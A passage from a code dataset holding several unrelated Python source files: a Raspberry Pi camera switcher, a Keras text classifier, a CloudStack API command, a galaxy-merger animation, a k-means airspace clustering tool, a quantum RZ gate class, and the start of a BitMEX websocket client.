&\" # will time after 30 min\n #os.system(cmd)\n\n elif camera == 1:\n permit = False\n i2c = \"i2cset -y 1 0x70 0x00 0x06\"\n os.system(i2c)\n gp.output(7, False)\n gp.output(11, True)\n gp.output(12, False)\n print(\"camera B\")\n \n #print(\"starting camera thread... \")\n #if(threadA.isAlive()):\n # print(\"but wainting for camera A thread to rejoind... \")\n # threadA.join(1)\n # print(\"camera a closed\")\n #if(threading.activeCount() >1):\n # print(\"waiting to close\")\n # time.sleep(2)\n threadB = myThread(2,\"Camera b\", 1)\n threadB.start()\n \n #cmd = \"raspistill -p 10,10,852,480 -t 1800000 -k &\"S\n #os.system(cmd)\n# to end current camera process, press key k then key enter\n# then press the y button to swap camera\n# NOTE: the keystorks must be within the terminal or else the operation will not work.\n","sub_path":"orginalCamera.py","file_name":"orginalCamera.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"404669918","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom gensim.models import Word2Vec\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils.np_utils import to_categorical\nfrom keras.layers import Dense, Flatten, Dropout, Activation, Input, LSTM, Bidirectional\nfrom keras.models import Sequential\nfrom keras.engine import Model\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding, concatenate\nfrom keras.constraints import max_norm\nfrom keras.regularizers import l2\n\nimport os\nimport numpy as np\nimport codecs\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\nS_CNN = True\nM_CNN = False\n\nU_LSTM = False\nB_LSTM = False\n\nCNN_LSTM = False\n\nnp.random.seed(1337)\nMAX_SEQUENCE_LENGTH = 25\nMAX_NB_WORDS = 20000\nEMBEDDING_DIM = 300\nDATA_DIR = 'data/word'\n\ntrain_texts = []\ntrain_labels = []\nvalid_texts = []\nvalid_labels = []\n\nmodel_names = []\nbest_accuracy = []\n\nlabels_index = {'history': 0,\n 'military': 1,\n 'baby': 2,\n 'world': 3,\n 'tech': 4,\n 'game': 5,\n 'society': 6,\n 'sports': 7,\n 'travel': 8,\n 'car': 9,\n 'food': 10,\n 'entertainment': 11,\n 'finance': 12,\n 'fashion': 13,\n 'discovery': 14,\n 'story': 15,\n 'regimen': 16,\n 'essay': 17}\n\n\ndef single_cnn():\n\n model = Sequential()\n\n model.add(Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True))\n\n model.add(Conv1D(filters=250,\n kernel_size=3,\n padding='valid',\n activation='relu',\n strides=1))\n\n model.add(MaxPooling1D(pool_size=model.output_shape[1]))\n\n model.add(Flatten())\n\n model.add(Dense(128))\n model.add(Dropout(0.2))\n model.add(Activation('relu'))\n\n model.add(Dense(len(labels_index), activation='softmax'))\n\n return model\n\n\ndef multi_cnn():\n nb_filter = 250\n filter_lengths = [2, 3, 5, 7]\n sequence_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32')\n embedding_layer = Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True)\n embedded_sequences = embedding_layer(sequence_input)\n\n cnn_layers = []\n\n for filter_length in filter_lengths:\n x = Conv1D(filters=nb_filter,\n kernel_size=filter_length,\n padding='valid',\n activation='relu',\n kernel_constraint=max_norm(3),\n kernel_regularizer=l2(0.0001),\n strides=1)(embedded_sequences)\n x = MaxPooling1D(pool_size=MAX_SEQUENCE_LENGTH - filter_length + 1)(x)\n x = Flatten()(x)\n cnn_layers.append(x)\n\n x = concatenate(cnn_layers)\n x = Dropout(0.2)(x)\n x = Dense(128, activation='relu')(x)\n y_hat = Dense(len(labels_index), activation='softmax')(x)\n\n model = Model(sequence_input, y_hat)\n\n return model\n\n\ndef unidirection_lstm():\n\n model = Sequential()\n\n model.add(Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True))\n model.add(LSTM(128, dropout=0.2, recurrent_dropout=0.2))\n model.add(Dense(len(labels_index), activation='softmax'))\n\n return model\n\n\ndef bidirection_lstm():\n\n model = Sequential()\n\n model.add(Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True))\n model.add(Bidirectional(LSTM(128)))\n model.add(Dropout(0.5))\n model.add(Dense(len(labels_index), activation='softmax'))\n\n return model\n\n\ndef cnn_lstm():\n model = Sequential()\n\n model.add(Embedding(nb_words + 1,\n 
EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True))\n model.add(Dropout(0.25))\n model.add(Conv1D(filters=1000,\n kernel_size=3,\n padding='valid',\n activation='relu',\n strides=1))\n model.add(MaxPooling1D(pool_size=model.output_shape[1]))\n model.add(LSTM(128))\n model.add(Dense(len(labels_index), activation='softmax'))\n\n return model\n\n\nif __name__ == '__main__':\n\n print('Indexing word vectors.')\n\n pre_trained_embeddings = Word2Vec.load('nlpcc_task2_300_dim.bin')\n\n weights = pre_trained_embeddings.wv.syn0\n embeddings_index = dict([(k, v.index) for k, v in pre_trained_embeddings.wv.vocab.items()])\n\n print('Found %s word vectors.' % len(embeddings_index))\n\n print('Processing text dataset')\n\n with codecs.open(os.path.join(DATA_DIR, 'train.txt'), 'rb') as f:\n for line in f.readlines():\n train_texts.append(line.strip().split('\\t')[1])\n train_labels.append(labels_index[line.strip().split('\\t')[0]])\n\n with codecs.open(os.path.join(DATA_DIR, 'dev.txt'), 'rb') as f:\n for line in f.readlines():\n valid_texts.append(line.strip().split('\\t')[1])\n valid_labels.append(labels_index[line.strip().split('\\t')[0]])\n\n print('Found %s train texts.' % len(train_texts))\n print('Found %s valid texts.' % len(valid_texts))\n\n tokenizer = Tokenizer(num_words=MAX_NB_WORDS)\n tokenizer.fit_on_texts(train_texts)\n train_sequences = tokenizer.texts_to_sequences(train_texts)\n valid_sequences = tokenizer.texts_to_sequences(valid_texts)\n\n word_index = tokenizer.word_index\n print('Found %s unique tokens.' % len(word_index))\n\n x_train = pad_sequences(train_sequences, maxlen=MAX_SEQUENCE_LENGTH)\n x_valid = pad_sequences(valid_sequences, maxlen=MAX_SEQUENCE_LENGTH)\n\n y_train = to_categorical(np.asarray(train_labels))\n y_valid = to_categorical(np.asarray(valid_labels))\n print('Shape of train data tensor:', x_train.shape)\n print('Shape of train label tensor:', y_train.shape)\n print('Shape of valid data tensor:', x_valid.shape)\n print('Shape of valid label tensor:', y_valid.shape)\n\n print('Preparing embedding matrix.')\n\n nb_words = min(MAX_NB_WORDS, len(word_index))\n embedding_matrix = np.zeros((nb_words + 1, EMBEDDING_DIM))\n\n for word, i in word_index.items():\n if i > MAX_NB_WORDS:\n continue\n embedding_vector = embeddings_index.get(word.decode('utf-8'))\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n embedding_matrix[i] = weights[embeddings_index[word.decode('utf-8')], :]\n if S_CNN:\n\n s_cnn = single_cnn()\n s_cnn.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n s_cnn_hist = s_cnn.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(s_cnn_hist.history['val_acc']))\n model_names.append('S_CNN')\n # save results\n s_cnn_result_array = s_cnn.predict_classes(x_valid, batch_size=128)\n np.save('data/s_cnn_result.npy', s_cnn_result_array)\n print('s_cnn result shape:', s_cnn_result_array.shape)\n\n if M_CNN:\n m_cnn = multi_cnn()\n m_cnn.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n m_cnn_hist = m_cnn.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(m_cnn_hist.history['val_acc']))\n model_names.append('M_CNN')\n # save results\n m_cnn_result_array = m_cnn.predict(x_valid, batch_size=128)\n m_cnn_result_classes = [np.argmax(class_list) for class_list in 
m_cnn_result_array]\n m_cnn_result_classes_array = np.asarray(m_cnn_result_classes, dtype=np.int8)\n np.save('data/m_cnn_result.npy', m_cnn_result_classes_array)\n print('m_cnn result shape:', m_cnn_result_classes_array.shape)\n\n if U_LSTM:\n u_lstm = unidirection_lstm()\n u_lstm.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n u_lstm_hist = u_lstm.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(u_lstm_hist.history['val_acc']))\n model_names.append('U_LSTM')\n # save results\n u_lstm_result_array = u_lstm.predict_classes(x_valid, batch_size=128)\n np.save('data/u_lstm_result.npy', u_lstm_result_array)\n print('u_lstm result shape:', u_lstm_result_array.shape)\n\n if B_LSTM:\n b_lstm = bidirection_lstm()\n b_lstm.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n b_lstm_hist = b_lstm.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(b_lstm_hist.history['val_acc']))\n model_names.append('B_LSTM')\n # save results\n b_lstm_result_array = b_lstm.predict_classes(x_valid, batch_size=128)\n np.save('data/b_lstm_result.npy', b_lstm_result_array)\n print('b_lstm result shape:', b_lstm_result_array.shape)\n\n if CNN_LSTM:\n conv_lstm = cnn_lstm()\n conv_lstm.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n conv_lstm_hist = conv_lstm.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(conv_lstm_hist.history['val_acc']))\n model_names.append('CNN_LSTM')\n # save results\n conv_lstm_result_array = conv_lstm.predict_classes(x_valid, batch_size=128)\n np.save('data/conv_lstm_result.npy', conv_lstm_result_array)\n print('conv_lstm result shape:', conv_lstm_result_array.shape)\n\n # # Plot model accuracy\n # for idx, hist in enumerate(hists):\n # plt.plot(hist.history['acc'], color='blue', label=model_names[idx]+' train')\n # plt.plot(hist.history['val_acc'], color='red', label=model_names[idx] + ' valid')\n # plt.title('Model Accuracy')\n # plt.ylabel('accuracy')\n # plt.xlabel('epoch')\n # plt.legend(loc='upper left')\n # plt.savefig('accuracy.png')\n #\n # # Plot model loss\n # for idx, hist in enumerate(hists):\n # plt.plot(hist.history['loss'], color='blue', label=model_names[idx] + ' train')\n # plt.plot(hist.history['val_loss'], color='red', label=model_names[idx] + ' valid')\n # plt.title('Model Loss')\n # plt.ylabel('loss')\n # plt.xlabel('epoch')\n # plt.legend(loc='lower left')\n # plt.savefig('loss.png')\n\n print('Results Summary')\n assert len(model_names) == len(best_accuracy)\n for i in range(len(model_names)):\n print('*' * 20)\n print('Model Name:', model_names[i])\n print('Best Accuracy:', best_accuracy[i])\n print('*' * 20)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"142694845","text":"\"\"\"Deletes a vmsnapshot.\"\"\"\nfrom baseCmd import *\nfrom baseResponse import *\n\n\nclass deleteVMSnapshotCmd (baseCmd):\n typeInfo = {}\n\n def __init__(self):\n self.isAsync = \"true\"\n \"\"\"The ID of the VM snapshot\"\"\"\n \"\"\"Required\"\"\"\n self.vmsnapshotid = None\n self.typeInfo['vmsnapshotid'] = 'uuid'\n self.required = [\"vmsnapshotid\", ]\n\n\nclass deleteVMSnapshotResponse (baseResponse):\n typeInfo = {}\n\n def __init__(self):\n \"\"\"any text associated with the success or failure\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if operation is executed successfully\"\"\"\n self.success = None\n self.typeInfo['success'] = 'boolean'\n\n","sub_path":"marvin/cloudstackAPI/deleteVMSnapshot.py","file_name":"deleteVMSnapshot.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"398895589","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 25 10:28:49 2020\n@author: Cindy, Bjorn, Sean\n- Need to figure out why rhs_2_body takes so long to run every time\n- Need to adapt the right hand side function in main to work with the integrator function\n- Need to create option to load solution from data file and animate rather than running\n- Need to create a function to determine percentage of ejected material using energy\n\"\"\"\n\nimport main1 as main # rename as needed\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as ani\nimport matplotlib as mpl\nfrom astropy.table import Table, Column\n\n\nplt.close('all')\n\n'''\nAnimation parameters:\n x_spacing ; additional space to leave on plots in x-direction\n y_spacing ; additional space to leave on plots in y-direction\n animation_speed_scaling ; increase for faster animation\n save_animation\n animation_writer ; recommended either imagemagick or ffmpeg\n animation_dir ; save animations to this directory\n animation_file_name ; option to create custom file name:\n - .gif for imagemagick, .mp4 for ffmpeg\n - leave blank to automatically create file name\n - do not start with '_ani' unless you want to confuse my dumb program\n histograms ; set true to display histograms\n'''\n\nx_spacing = 0.1\ny_spacing = 0.1\nanimation_speed_scaling = 1\n#save_animation = False\nanimation_writer = 'imagemagick'\nanimation_dir = 'animations' # make this folder if it doesn't exist already\nanimation_file_name = ''\n#histograms = True\n\n# I am having the animate function call main so all work done toying with\n# parameters and initial conditions can be done just in this file\n\n'''\n# rotated galaxy; euler angles in radians; easy test case\nsolution, num_galaxies = main.main(num_galaxies=1, galaxy_pos=np.array([[-10,-2,0]]),\n galaxy_vel=np.array([[0,0,0]]), euler_angles=np.array([[1.47,0.0,0.0]]),\n t_max=1.0, nt=1001, num_rings=5, save=False, check_n=False)\n'''\n\n# galaxy merger with galactic discs in the yz plane\nsolution, num_galaxies, n_total, nt = main.main(num_galaxies=2, galaxy_pos=np.array([[-2,-5,0],[2,5,0]]),\n galaxy_vel=np.array([[0,3,0],[0,-3,0]]),\n euler_angles=np.array([[0,0,0],[0,np.pi/2,0]]),\n t_max=5, nt=2001, r_outer=2, num_rings=1,\n check_n=True)\n\n\nn_total = np.shape(solution['y'])[0]//2-num_galaxies\nt_max = np.max(solution['t'])\nnt = np.size(solution['t'])\n\n# initialization function for animation\ndef init_animate():\n for i in range(num_galaxies):\n cent_bodies[i].set_data([], [])\n point_bodies[i].set_data([], [])\n time_text[0].set_text('')\n return patches\n\n# what to animate at every frame\ndef animate(i):\n # scaling speeds up the animation\n i*=animation_speed_scaling\n # plot the trajectories at given frame\n x_cent = np.zeros(num_galaxies)\n y_cent = np.zeros(num_galaxies)\n x = np.zeros(n_total)\n y = np.zeros(n_total)\n # set up data pairs for animations of all point bodies\n j_sol = num_galaxies*2\n for j in range(n_total):\n x[j] = solution['y'][j_sol, 0][i]\n y[j] = solution['y'][j_sol, 1][i]\n j_sol += 2\n # loop across all galaxies\n last_index = 0\n for j in range(num_galaxies):\n x_cent[j] = solution['y'][2*j,0][i]\n y_cent[j] = solution['y'][2*j,1][i]\n # update the artists; the complicated indexing is just to identify\n # which point bodies are associated with which galaxy\n cent_bodies[j].set_data(x_cent[j], y_cent[j])\n next_index = n_total*(j+1)//num_galaxies\n point_bodies[j].set_data(x[last_index:next_index],\n 
y[last_index:next_index])\n last_index = next_index\n # change the text to reflect current age\n time_text[0].set_text('years: ' + format(solution['t'][i],'.2'))\n return patches\n\ndef plot_bounds():\n x_min = np.min(solution['y'][::2,0,:]) - x_spacing\n x_max = np.max(solution['y'][::2,0,:]) + x_spacing\n y_min = np.min(solution['y'][::2,1,:]) - y_spacing\n y_max = np.max(solution['y'][::2,1,:]) + y_spacing\n return np.array([x_min, x_max, y_min, y_max])\n\ndef SaveAnimation(file_name, writer, fps=60, bitrate=-1):\n print('Saving animation')\n # create new animation file name, if one does not exist already\n if file_name == '':\n file_name = main.FileName('ani', animation_dir, data_type = '.gif')\n # save animation as gif using imagemagick\n animation.save(animation_dir + '/' + file_name,\n writer=writer, fps=fps, bitrate=bitrate,\n metadata=dict(artist='Chico_Astro'))\n\n# In[0]\n'''\nPLOTTING\n'''\n# setting plotting options\ngrid_style = { 'alpha' : '0.75',\n 'linestyle' : ':' }\nlegend_style = { 'fontsize' : '10' }\nfont_syle = { 'size' : '14' }\nmpl.rc( 'font', **font_syle)\nmpl.rc( 'grid', **grid_style)\nmpl.rc('legend', **legend_style)\n \nfig, ax=plt.subplots(1,1, figsize=(8,4))\n# initialize points to represent bodies and text to be animated\n# central bodies\ncent_body1, = [plt.plot([], [], 'ok')]\ncent_body2, = [plt.plot([], [], 'or')]\ncent_bodies = cent_body1 + cent_body2\n# point bodies\npoint_bodies1, = [plt.plot([], [], '.k')]\npoint_bodies2, = [plt.plot([], [], '.r')]\npoint_bodies = point_bodies1 + point_bodies2\n# text\ntime_text = [plt.text(0.15, 0.15, '', transform=plt.gcf().transFigure)]\npatches = cent_bodies + point_bodies + time_text\n# animate\nanimation = ani.FuncAnimation(fig, animate, init_func=init_animate,\n frames=nt//animation_speed_scaling,\n interval=10, blit=True)\n# determine plot bounds\nax.grid()\nbounds = plot_bounds()\nplt.xlim(bounds[0], bounds[1])\nplt.ylim(bounds[2], bounds[3])\nplt.xlabel('x (AU)')\nplt.ylabel('y (AU)')\nax.set_facecolor('whitesmoke')\nax.patch.set_alpha(0.1)\n\n# In[1]\n","sub_path":"animate6.py","file_name":"animate6.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"452478497","text":"from typing import List, Any\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nfrom sklearn.cluster import KMeans\n\nfileName = 't1.txt'\n\nK = 35\n# The number of Cluster\n\nN = 300\n# The number of iterate times\n\nDistance_per_point = 5\n# set a point per airline\n\n\nw1 = 80\n# the importance of distance between two points\n\nw2 = 70\n# the importance of airplanes number\n\nclass Airplane:\n name = \"null\"\n # the name of this point\n type = 0\n # the type 1 for airlines 2 for airport\n\n belong = np.zeros(K, dtype=np.int_, order='C')\n # the number belongs to every cluster\n # would be 00001000 e.t.c for point\n # would be 10204005 e.t.c for airlines\n\n cluster = 1\n # belong to which Cluster\n\n Fcoord = np.zeros(2, dtype=np.float_, order='C')\n Tcoord = np.zeros(2, dtype=np.float_, order='C')\n # Coord from && to\n\n data = np.zeros(34, dtype=np.float_, order='C')\n\n def __init__(self, tlist):\n self.name = tlist[0]\n self.type = int(tlist[1])\n self.Fcoord = np.asarray(tlist[2:4], dtype=np.float_)\n self.Tcoord = np.asarray(tlist[4:6], dtype=np.float_)\n self.data = np.asarray(tlist[6:], dtype=np.float_)\n\n # update Cluster\n def updataBelong(self):\n tCluster = self.cluster\n temp = 0\n for index, item in enumerate(self.belong):\n if (temp < item):\n temp = item\n tCluster = index\n self.cluster = tCluster\n\n def display(self):\n print(self.name, self.type, self.Fcoord, self.Tcoord, self.data)\n\n\nclass Point:\n\n def __init__(self, air: Airplane, Coord=np.zeros(2, dtype=np.float_), parent=0):\n self.data = air.data\n self.name = air.name\n self.coord = np.zeros(2, dtype=np.float_)\n self.coord = Coord\n self.parent = parent\n self.type = air.type\n\n def display(self):\n print(self.name, self.coord, self.belongsTo, self.data, self.color)\n\n def mkData(self, left, right):\n self.cData = np.zeros(36, dtype=np.float_)\n self.cData[:2] = self.coord * w1\n self.cData[2+left*2:4+right*2] = self.data[left*2:2+right*2]\n for index,i in enumerate(self.cData):\n if index > 1 and index % 2 == 1:\n self.cData[index] *= w2\n\n\nairsList = [] # type: list[Airplane]\npointList = [] # type: list[point]\nPointN = 0\nansList = []\n\n\n# read data from file\ndef readFile():\n file = open(fileName)\n FileContex = file.readlines()\n for i in FileContex:\n tlist = i.split(' ')\n airsList.append(Airplane(tlist))\n\n\n# calc Euclidean Distance for vector\ndef calcDis(Veca, Vecb):\n return np.linalg.norm(Veca - Vecb)\n\n\ndef mkPoint():\n global PointN\n global pointList\n global airsList\n for index, i in enumerate(airsList):\n if i.type == 0:\n pointList.append(Point(i, parent=index, Coord=i.Fcoord))\n PointN += 1\n else:\n From = i.Fcoord\n To = i.Tcoord\n delta = To - From\n pointNumber = calcDis(From, To) / Distance_per_point\n pointNumber = int(pointNumber)\n delta /= pointNumber\n for j in range(pointNumber):\n Coord = From + delta * j\n pointList.append(Point(i, parent=index, Coord=Coord))\n PointN += 1\n pointList.append(Point(i, parent=index, Coord=To))\n PointN += 1\n\n\ndef mkPic(l,r,ans):\n ax = plt.subplot(1, 1, 1, projection='3d')\n ax.set_xlabel('longitude')\n ax.set_ylabel('latitude')\n ax.set_zlabel('data')\n clist = []\n dlist = []\n for i in DATA[ans]:\n clist.append(i.coord.tolist())\n\n rlist = []\n c = []\n nameL = []\n sum = 0\n p:Point\n for i in pointList:\n i.mkData(l - 6, r - 7)\n t = np.sum(i.cData[2:])\n if i.coord.tolist() in clist:\n c.append(1)\n if sum < t:\n sum = t\n p = 
i\n else:\n c.append(0)\n rlist.append(i.coord)\n dlist.append(t)\n nameL.append(i.name)\n\n rlist = np.asarray(rlist,dtype=np.float_)\n ax.scatter(rlist[:,0], rlist[:,1],dlist,c=c)\n tlist = []\n for index,i in enumerate(nameL):\n if not i in tlist:\n tlist.append(i)\n ax.text(rlist[index][0],rlist[index][1],dlist[index],i)\n\n print('CHOSEN: ')\n print(p.name + ' ' + str(p.coord))\n\n\n\ndef k_means(left=0, right=17):\n cList = []\n pList = []\n i: Point\n for index, i in enumerate(pointList):\n pointList[index].mkData(left, right)\n pList.append(i.parent)\n cList.append(pointList[index].cData)\n cList = np.asarray(cList, dtype=np.float_)\n result = KMeans(n_clusters=K, max_iter=N).fit_predict(cList)\n # print(result)\n a = []\n for i in range(K):\n a.append([])\n for index, j in enumerate(result):\n a[j].append(np.sum(np.asarray(cList[index][2:])))\n\n c = []\n cc = []\n for i in a:\n c.append(np.mean(np.asarray(i)))\n cc.append(np.mean(np.asarray(i)))\n\n tpos = np.argmax(np.asarray(c))\n tnum = cc[tpos]\n sum = 0\n for i in cc:\n sum += tnum - i;\n\n slist = []\n dlist = []\n for index, i in enumerate(result):\n if i == tpos:\n slist.append(index)\n dlist.append(pointList[index])\n\n return sum, slist, dlist\n\n\nSUM = []\nRESULT = []\nDATA = []\n\n\ndef main_process():\n index = 0\n for l in range(17):\n for r in range(l, 17):\n tSum, tResult, tDATA = k_means(l, r)\n SUM.append(tSum)\n RESULT.append(tResult)\n DATA.append(tDATA)\n index += 1\n print(float(index / 153 * 100), '% has done')\n\n\ndef query(op=1, len=1, left=6, right=7):\n\n ans = 0\n left = left - 6\n right = right - 7\n ansl = left\n ansr = right\n index = 0\n if op == 1: # [L,R]\n for l in range(17):\n for r in range(l, 17):\n if l == left and r == right:\n ans = index\n index += 1\n\n if op == 2:\n tsum = 0\n for l in range(17):\n for r in range(l, 17):\n if r - l + 1 <= len:\n if tsum < SUM[index]:\n tsum = SUM[index]\n ans = index\n ansl = l\n ansr = r\n index += 1\n return ans,ansl+6,ansr+7\n\nreadFile()\nmkPoint()\nmain_process()\nprint('The number of POINTs is:', str(PointN))\nprint('The number of CLUSTERs is:', str(K))\nwhile(True):\n op = int(input())\n tl = 0\n tr = 0\n tlen = 0\n if(op == 1):\n tl = int(input())\n tr = int(input())\n else:\n tlen = int(input())\n ans,l,r = query(op=op,left=tl,right=tr,len=tlen)\n mkPic(l,r,ans)\n print(l,r)\n for i in DATA[ans]:\n print(i.name + ' ' + str(i.coord))\n plt.show()\n","sub_path":"异常空域单元识别/t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"240237950","text":"\"\"\"This module implements the RZGate.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Sequence\n\nimport numpy as np\n\nfrom bqskit.ir.gates.qubitgate import QubitGate\nfrom bqskit.qis.unitary.differentiable import DifferentiableUnitary\nfrom bqskit.qis.unitary.unitarymatrix import UnitaryMatrix\n\n\nclass RZGate(QubitGate, DifferentiableUnitary):\n \"\"\"A gate representing an arbitrary rotation around the Z axis.\"\"\"\n\n size = 1\n num_params = 1\n qasm_name = 'rz'\n\n def get_unitary(self, params: Sequence[float] = []) -> UnitaryMatrix:\n \"\"\"Returns the unitary for this gate, see Unitary for more info.\"\"\"\n self.check_parameters(params)\n\n pexp = np.exp(1j * params[0] / 2)\n nexp = np.exp(-1j * params[0] / 2)\n\n return UnitaryMatrix(\n [\n [nexp, 0],\n [0, pexp],\n ],\n )\n\n def get_grad(self, params: Sequence[float] = []) -> np.ndarray:\n \"\"\"Returns the gradient for this gate, see Gate for more info.\"\"\"\n self.check_parameters(params)\n\n dpexp = 1j * np.exp(1j * params[0] / 2) / 2\n dnexp = -1j * np.exp(-1j * params[0] / 2) / 2\n\n return np.array(\n [\n [\n [dnexp, 0],\n [0, dpexp],\n ],\n ], dtype=np.complex128,\n )\n","sub_path":"bqskit/ir/gates/parameterized/rz.py","file_name":"rz.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"505412923","text":"import json\nimport logging\nimport math\nimport threading\nimport traceback\nfrom time import sleep\nfrom urllib.parse import urlunparse, urlparse\n\nimport websocket\n\nfrom bitmex_tools.order_book_l2 import OrderBookL2\n\nlogger = logging.getLogger(__name__)\n\n\nclass BitMEXWebsocket:\n # Don't grow a table larger than this amount. Helps cap memory usage.\n MAX_TABLE_LEN = 200\n\n def __init__(self, endpoint, symbol, api_key=None, api_secret=None):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n logger.debug('Initializing WebSocket.')\n\n self.endpoint = endpoint\n self.symbol = symbol\n\n if api_key is not None and api_secret is None:\n raise ValueError('api_secret is required if api_key is provided')\n if api_key is None and api_secret is not None:\n raise ValueError('api_key is required if api_secret is provided')\n\n self.api_key = api_key\n self.api_secret = api_secret\n\n self.data = {}\n self.keys = {}\n self.exited = False\n\n self.order_book_l2 = OrderBookL2()\n\n # We can subscribe right in the connection querystring, so let's build that.\n # Subscribe to all pertinent endpoints\n wsURL = self.__get_url()\n logger.info('Connecting to %s' % wsURL)\n self.__connect(wsURL)\n logger.info('Connected to WS.')\n\n def exit(self):\n \"\"\"Call this to exit - will close websocket.\"\"\"\n self.exited = True\n self.ws.close()\n\n def get_instrument(self):\n \"\"\"Get the raw instrument data for this symbol.\"\"\"\n # Turn the 'tickSize' into 'tickLog' for use in rounding\n instrument = self.data['instrument'][0]\n instrument['tickLog'] = int(math.fabs(math.log10(instrument['tickSize'])))\n return instrument\n\n def __connect(self, wsURL):\n \"\"\"Connect to the websocket in a thread.\"\"\"\n logger.debug('Starting thread')\n\n self.ws = websocket.WebSocketApp(wsURL,\n on_message=self.__on_message,\n on_close=self.__on_close,\n on_open=self.__on_open,\n on_error=self.__on_error\n )\n\n self.wst = threading.Thread(target=lambda: self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n logger.debug('Started thread')\n\n # Wait for connect before continuing\n conn_timeout = 5\n while not self.ws.sock or not self.ws.sock.connected and conn_timeout:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout:\n logger.error('Couldnt connect to WS! Exiting.')\n self.exit()\n raise websocket.WebSocketTimeoutException('Couldnt connect to WS! Exiting.')\n\n def __get_url(self):\n \"\"\"\n Generate a connection URL. We can define subscriptions right in the querystring.\n Most subscription topics are scoped by the symbol we're listening to.\n \"\"\"\n\n # You can sub to orderBookL2 for all levels, or orderBookL2 for top 10 levels & save bandwidth\n symbolSubs = ['orderBookL2']\n genericSubs = ['margin']\n\n subscriptions = [sub + ':' + self.symbol for sub in symbolSubs]\n subscriptions += genericSubs\n\n urlParts = list(urlparse(self.endpoint))\n urlParts[0] = urlParts[0].replace('http', 'ws')\n urlParts[2] = '/realtime?subscribe={}'.format(','.join(subscriptions))\n return urlunparse(urlParts)\n\n def __wait_for_account(self):\n \"\"\"On subscribe, this data will come down. Wait for it.\"\"\"\n # Wait for the keys to show up from the ws\n while not {'margin', 'position', 'order', 'orderBookL2'} <= set(self.data):\n sleep(0.1)\n\n def __wait_for_symbol(self, symbol):\n \"\"\"On subscribe, this data will come down. 
Wait for it.\"\"\"\n while not {'instrument', 'trade', 'quote'} <= set(self.data):\n sleep(0.1)\n\n def __send_command(self, command, args=None):\n \"\"\"Send a raw command.\"\"\"\n if args is None:\n args = []\n self.ws.send(json.dumps({'op': command, 'args': args}))\n\n def __on_message(self, ws, message):\n message = json.loads(message)\n logger.debug(json.dumps(message))\n table = message['table'] if 'table' in message else None\n action = message['action'] if 'action' in message else None\n try:\n if 'subscribe' in message:\n logger.debug('Subscribed to %s.' % message['subscribe'])\n elif action:\n if table not in self.data:\n self.data[table] = []\n self.order_book_l2.message(message)\n except:\n logger.error(traceback.format_exc())\n\n def __on_error(self, ws, error):\n \"\"\"Called on fatal websocket errors. We exit on these.\"\"\"\n print('Bitmex socket had a problem', self.symbol, error)\n wsURL = self.__get_url()\n print('Connecting to %s' % wsURL)\n self.__connect(wsURL)\n print('Connected to WS.')\n # if not self.exited:\n # logger.error('Error : %s' % error)\n # raise websocket.WebSocketException(error)\n\n def __on_open(self, ws):\n \"\"\"Called when the WS opens.\"\"\"\n logger.debug('Websocket Opened.')\n\n def __on_close(self, ws):\n \"\"\"Called on websocket close.\"\"\"\n logger.info('Websocket Closed')\n\n\nif __name__ == '__main__':\n a = 